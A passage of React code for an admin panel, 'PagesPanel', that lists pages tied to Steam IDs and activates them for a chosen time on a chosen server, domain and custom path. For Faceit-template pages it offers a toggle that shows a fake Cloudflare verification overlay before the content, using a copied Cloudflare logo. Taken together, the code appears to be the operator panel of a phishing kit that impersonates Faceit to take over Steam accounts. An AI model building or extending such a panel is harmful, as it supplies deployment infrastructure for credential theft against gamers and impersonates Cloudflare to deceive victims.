                                >
                                  <Copy className="w-3 h-3 opacity-50 group-hover:opacity-100 transition-opacity" />
                                  /{activation.custom_path}
                                </button>
                                <span className="text-white/30 flex items-center gap-1">
                                  <Clock className="w-3 h-3" />{timeRemaining}
                                </span>
                              </div>
                            );
                          })}
                        </div>
                      ) : (
                        <span className="text-white/30 text-sm">—</span>
                      )}
                    </td>

                    {/* Actions */}
                    <td className="py-4 px-6">
                      <div className="flex items-center justify-end gap-1">
                        <a
                          href={page.preview_url}
                          target="_blank"
                          rel="noopener noreferrer"
                          className="p-2 text-white/30 hover:text-white hover:bg-white/5 rounded transition-colors"
                          title="Preview"
                        >
                          <Eye className="w-4 h-4" />
                        </a>
                        <button
                          onClick={() => handleOpenActivationModal(page)}
                          className="p-2 text-green-400/70 hover:text-green-400 hover:bg-green-400/10 rounded transition-colors"
                          title="Activate"
                        >
                          <Zap className="w-4 h-4" />
                        </button>
                        {activeActivations.length > 0 ? (
                          activeActivations.map((activation) => (
                            <button
                              key={activation.id}
                              onClick={() => handleDeleteActivation(activation.id)}
                              disabled={deletingId === page.id}
                              className="p-2 text-white/30 hover:text-red-400 hover:bg-red-400/10 rounded transition-colors disabled:opacity-50"
                              title={`Delete /${activation.custom_path}`}
                            >
                              {deletingId === page.id ? <Loader2 className="w-4 h-4 animate-spin" /> : <X className="w-4 h-4" />}
                            </button>
                          ))
                        ) : (
                          <button
                            onClick={() => handleDeletePage(page.id)}
                            disabled={deletingId === page.id}
                            className="p-2 text-white/30 hover:text-red-400 hover:bg-red-400/10 rounded transition-colors disabled:opacity-50"
                            title="Delete"
                          >
                            {deletingId === page.id ? <Loader2 className="w-4 h-4 animate-spin" /> : <Trash2 className="w-4 h-4" />}
                          </button>
                        )}
                      </div>
                    </td>
                  </tr>
                );
              })}
            </tbody>
          </table>
        )}
      </div>

      {/* Activation Modal */}
      {showActivationModal && selectedPage && (
        <div className="fixed inset-0 bg-black/80 flex items-center justify-center z-50 animate-backdrop">
          <div className="bg-black border border-white/10 rounded-xl w-full max-w-lg mx-4 animate-modal-in overflow-hidden">
            {/* Header */}
            <div className="px-6 py-5 border-b border-white/10 flex items-center justify-between">
              <div>
                <h3 className="text-lg font-medium text-white">Activate Page</h3>
                <p className="text-white/40 text-sm mt-0.5">Steam ID: <span className="font-mono text-white/60">{selectedPage.steam_id}</span></p>
              </div>
              <button
                onClick={handleCloseActivationModal}
                className="p-2 text-white/40 hover:text-white hover:bg-white/5 rounded-lg transition-colors"
              >
                <X className="w-5 h-5" />
              </button>
            </div>

            {activationError && (
              <div className="mx-6 mt-4 p-3 bg-red-500/10 border border-red-500/20 rounded-lg">
                <p className="text-red-400 text-sm">{activationError}</p>
              </div>
            )}

            <form onSubmit={handleActivate} className="p-6 space-y-5">
              {/* Server */}
              <div>
                <label className="block text-sm text-white/50 mb-2">Target Server</label>
                <select
                  className="w-full px-4 py-3 bg-white/[0.02] border border-white/10 rounded-lg text-white focus:outline-none focus:border-white/30 transition-colors"
                  value={activateData.server_id}
                  onChange={(e) => {
                    const serverId = e.target.value;
                    loadDomainsForServer(serverId);
                    setActivateData({ ...activateData, server_id: serverId, domain_id: '' });
                  }}
                  required
                >
                  <option value="">Select a server</option>
                  {servers.map((server) => (
                    <option key={server.id} value={server.id}>
                      {server.name} ({server.host})
                    </option>
                  ))}
                </select>
              </div>

              {/* Domain */}
              {activateData.server_id && (
                <div>
                  <label className="block text-sm text-white/50 mb-2">Domain (Optional)</label>
                  {isLoadingDomains ? (
                    <div className="flex items-center justify-center py-4">
                      <Loader2 className="w-5 h-5 text-white/40 animate-spin" />
                    </div>
                  ) : serverDomains.length === 0 ? (
                    <div className="p-3 bg-yellow-500/10 border border-yellow-500/20 rounded-lg">
                      <p className="text-yellow-400 text-sm">No domains available. Will use server IP.</p>
                    </div>
                  ) : (
                    <select
                      className="w-full px-4 py-3 bg-white/[0.02] border border-white/10 rounded-lg text-white focus:outline-none focus:border-white/30 transition-colors"
                      value={activateData.domain_id}
                      onChange={(e) => setActivateData({ ...activateData, domain_id: e.target.value })}
                    >
                      <option value="">Use server IP ({servers.find(s => s.id.toString() === activateData.server_id)?.host})</option>
                      {serverDomains.map((domain) => (
                        <option key={domain.id} value={domain.id}>{domain.domain}</option>
                      ))}
                    </select>
                  )}
                </div>
              )}

              {/* Duration */}
              <div>
                <label className="block text-sm text-white/50 mb-2">Duration</label>
                <div className="grid grid-cols-2 sm:grid-cols-5 gap-2">
                  {DURATION_OPTIONS.map((option) => (
                    <button
                      key={option.value}
                      type="button"
                      onClick={() => setActivateData({ ...activateData, duration: option.value })}
                      className={`py-2 rounded-lg text-sm font-medium transition-all ${activateData.duration === option.value
                        ? 'bg-white text-black'
                        : 'bg-white/5 border border-white/10 text-white/60 hover:bg-white/10'
                        }`}
                    >
                      {option.label}
                    </button>
                  ))}
                </div>
              </div>

              {/* Custom Path */}
              <div>
                <label className="block text-sm text-white/50 mb-2">Custom Path</label>
                <div className="flex items-center gap-2">
                  <span className="text-white/30 text-sm shrink-0">/p/</span>
                  <div className="relative flex-1">
                    <input
                      type="text"
                      className="w-full px-4 py-3 bg-white/[0.02] border border-white/10 rounded-lg text-white placeholder-white/30 focus:outline-none focus:border-white/30 transition-colors font-mono"
                      value={activateData.custom_path}
                      onChange={(e) => {
                        setActivateData({ ...activateData, custom_path: e.target.value });
                        setShowPathSuggestions(e.target.value.length > 0 && customPathHistory.length > 0);
                      }}
                      onFocus={() => setShowPathSuggestions(customPathHistory.length > 0)}
                      onBlur={() => setTimeout(() => setShowPathSuggestions(false), 200)}
                      placeholder="my-folder"
                      pattern="^[a-z0-9\-_/]+$"
                    />
                    {showPathSuggestions && customPathHistory.length > 0 && (
                      <div className="absolute top-full left-0 right-0 mt-1 bg-black border border-white/10 rounded-lg shadow-2xl z-50 max-h-32 overflow-y-auto">
                        {customPathHistory
                          .filter(path => path.toLowerCase().includes(activateData.custom_path.toLowerCase()))
                          .map((path, index) => (
                            <button
                              key={index}
                              type="button"
                              className="w-full text-left px-3 py-2 hover:bg-white/5 text-white/70 text-sm font-mono border-b border-white/5 last:border-b-0"
                              onClick={() => {
                                setActivateData({ ...activateData, custom_path: path });
                                setShowPathSuggestions(false);
                              }}
                            >
                              {path}
                            </button>
                          ))
                        }
                      </div>
                    )}
                  </div>
                </div>
              </div>

              {/* Cloudflare Loader (for Faceit pages only) */}
              {selectedPage.template_type === 'faceit' && (
                <div
                  onClick={() => setActivateData({ ...activateData, cloudflare_enabled: !activateData.cloudflare_enabled })}
                  className={`relative p-4 rounded-xl cursor-pointer transition-all duration-300 overflow-hidden group ${activateData.cloudflare_enabled
                    ? 'bg-gradient-to-br from-[#f38020]/20 to-[#f38020]/5 border-2 border-[#f38020]/60'
                    : 'bg-white/[0.02] border border-white/10 hover:border-white/20'
                    }`}
                >
                  {/* Glow effect when enabled */}
                  {activateData.cloudflare_enabled && (
                    <div className="absolute inset-0 pointer-events-none">
                      <div className="absolute top-1/2 left-8 -translate-y-1/2 w-20 h-20 bg-[#f38020] rounded-full blur-3xl opacity-40 animate-pulse" />
                    </div>
                  )}

                  <div className="relative flex items-center gap-4">
                    {/* Cloudflare Icon */}
                    <div className={`relative flex items-center justify-center w-12 h-12 rounded-xl transition-all duration-300 ${activateData.cloudflare_enabled
                      ? 'bg-[#f38020]/20 shadow-lg shadow-[#f38020]/30'
                      : 'bg-white/5 group-hover:bg-white/10'
                      }`}>
                      <svg
                        viewBox="25 0 75 35"
                        className={`w-8 h-8 transition-all duration-300 ${activateData.cloudflare_enabled
                          ? 'drop-shadow-[0_0_10px_rgba(243,128,32,0.8)]'
                          : ''
                          }`}
                      >
                        <defs>
                          <linearGradient id="cf-gradient" x1="0%" y1="0%" x2="100%" y2="100%">
                            <stop offset="0%" stopColor={activateData.cloudflare_enabled ? "#f38020" : "#666"} />
                            <stop offset="100%" stopColor={activateData.cloudflare_enabled ? "#f9a825" : "#444"} />
                          </linearGradient>
                        </defs>
                        <path
                          fill="url(#cf-gradient)"
                          d="M73.5,25.8c0.2-0.7,0.1-1.4-0.3-1.9c-0.4-0.5-1-0.7-1.7-0.8l-30.8-0.4c-0.2,0-0.3-0.1-0.4-0.2 c-0.1-0.1-0.1-0.3-0.1-0.4c0.1-0.3,0.3-0.5,0.6-0.5l31.1-0.4c2.2-0.1,4.5-1.9,5.3-4.1l1.4-3.6c0.1-0.2,0.1-0.4,0-0.6 c-1.5-6.8-7.6-11.9-14.8-11.9c-6.6,0-12.2,4.2-14.3,10.1c-1.3-1-3-1.5-4.8-1.3c-3.1,0.4-5.6,2.9-6,6c-0.1,0.8-0.1,1.5,0,2.2 c-5.1,0.2-9.1,4.3-9.1,9.4c0,0.5,0,1,0.1,1.4c0.1,0.3,0.3,0.5,0.6,0.5l42.7,0C72.9,29.4,73.3,26.5,73.5,25.8z"
                        />
                        <path
                          fill={activateData.cloudflare_enabled ? "#f9a825" : "#555"}
                          d="M82.8,17.7c-0.3,0-0.6,0-0.9,0c-0.2,0-0.4,0.1-0.5,0.4l-1,3.5c-0.2,0.7-0.1,1.4,0.3,1.9 c0.4,0.5,1,0.7,1.7,0.8l6.5,0.4c0.2,0,0.3,0.1,0.4,0.2c0.1,0.1,0.1,0.3,0.1,0.4c-0.1,0.3-0.3,0.5-0.6,0.5l-6.8,0.4 c-2.2,0.1-4.5,1.9-5.3,4.1l-0.4,1c-0.1,0.2,0,0.4,0.2,0.4l18.9,0c0.2,0,0.5-0.2,0.5-0.4c0.4-1.3,0.6-2.7,0.6-4.1 C96.5,21.2,90.5,17.7,82.8,17.7z"
                        />
                      </svg>
                      {/* Active indicator pulse */}
                      {activateData.cloudflare_enabled && (
                        <div className="absolute -top-1 -right-1 w-3 h-3 bg-[#f38020] rounded-full border-2 border-black animate-pulse" />
                      )}
                    </div>

                    {/* Text */}
                    <div className="flex-1">
                      <div className="flex items-center gap-2">
                        <span className={`font-semibold text-sm transition-colors ${activateData.cloudflare_enabled ? 'text-white' : 'text-white/60 group-hover:text-white/80'
                          }`}>
                          Cloudflare Protection
                        </span>
                        {activateData.cloudflare_enabled && (
                          <span className="px-2 py-0.5 text-[10px] font-bold bg-[#f38020] text-white rounded-full uppercase tracking-wide animate-pulse">
                            ON
                          </span>
                        )}
                      </div>
                      <p className={`text-xs mt-0.5 transition-colors ${activateData.cloudflare_enabled ? 'text-white/50' : 'text-white/30'
                        }`}>
                        Show verification overlay before content
                      </p>
                    </div>
                  </div>
                </div>
              )}

              {/* Preview URL */}
              {activateData.server_id && activateData.custom_path && (
                <div className="p-4 bg-white/[0.02] border border-white/10 rounded-lg">
                  <p className="text-white/40 text-xs mb-1">Preview URL</p>
                  <p className="text-white font-mono text-sm break-all">
                    https://{activateData.domain_id
                      ? serverDomains.find(d => d.id.toString() === activateData.domain_id)?.domain
                      : servers.find(s => s.id.toString() === activateData.server_id)?.host
                    }/p/{activateData.custom_path}/
                  </p>
                </div>
              )}

              {/* Actions */}
              <div className="flex gap-3 pt-2">
                <button
                  type="button"
                  onClick={handleCloseActivationModal}
                  className="flex-1 py-3 border border-white/10 text-white/70 rounded-lg hover:bg-white/5 transition-colors"
                >
                  Cancel
                </button>
                <button
                  type="submit"
                  disabled={isActivating || !activateData.server_id || !activateData.custom_path}
                  className="flex-1 py-3 bg-green-500 text-white rounded-lg font-medium hover:bg-green-600 transition-colors flex items-center justify-center gap-2 disabled:opacity-50 disabled:cursor-not-allowed"
                >
                  {isActivating ? (
                    <>
                      <Loader2 className="w-4 h-4 animate-spin" />
                      <span>Activating...</span>
                    </>
                  ) : (
                    <>
                      <Zap className="w-4 h-4" />
                      <span>Activate</span>
                    </>
                  )}
                </button>
              </div>
            </form>
          </div>
        </div>
      )}
    </div>
  );
};

export default PagesPanel;
